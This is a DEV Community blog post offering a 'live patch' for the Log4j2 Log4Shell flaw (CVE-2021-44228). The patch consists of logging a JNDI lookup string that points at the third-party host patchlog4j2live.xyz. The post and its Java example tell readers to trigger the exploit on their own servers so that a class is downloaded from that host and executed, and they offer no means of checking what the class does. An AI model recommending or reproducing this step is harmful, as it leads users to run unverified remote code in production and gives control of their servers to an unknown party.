Use this to automatically patch running log4j2 vulnerability... no need to restart the server

#log4j #java #cve #cve202144228

Log your message with following to patch your server LIVE against Log4j2 RCE (CVE-2021-44228):

logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");

This will automatically patch your running log4j instance and remove remote lookups, thus, sub-siding the RCE (CVE-2021-44228).

You can verify with following codebase(use vulnerable version of log4j to test obviously 🤷‍♂️):

public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        // This will hit the server and download the class that will patch live log4j
        logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");

        // The RCE should not work now... if you still see message printed
        // such as: "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS",
        // that means the patch didn't work.
        // Raise issue here: https://github.com/freakynit/Logout4Shell
        // or here (original version): https://github.com/Cybereason/Logout4Shell
        logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");
    }
}

This is based on this awesome codebase by Cybereason: https://github.com/Cybereason/Logout4Shell

Safe logging...

Disclaimer: I will not be liable for anything good, or bad, happening from using above. This is solely for a quick resolution.

DEV Community

Use this to automatically patch running log4j2 vulnerability... no need to restart the server

Top comments (0)

Read next

Introduction to WebClient in Java 17: A Modern Way to Handle HTTP Requests

Fixing "DemoApplication.java is a Non-Project File"

10 Essential Lombok Annotations Every Java Developer Needs to Master!

A brand new Java scaffolding has been born today for Make Java Great Again!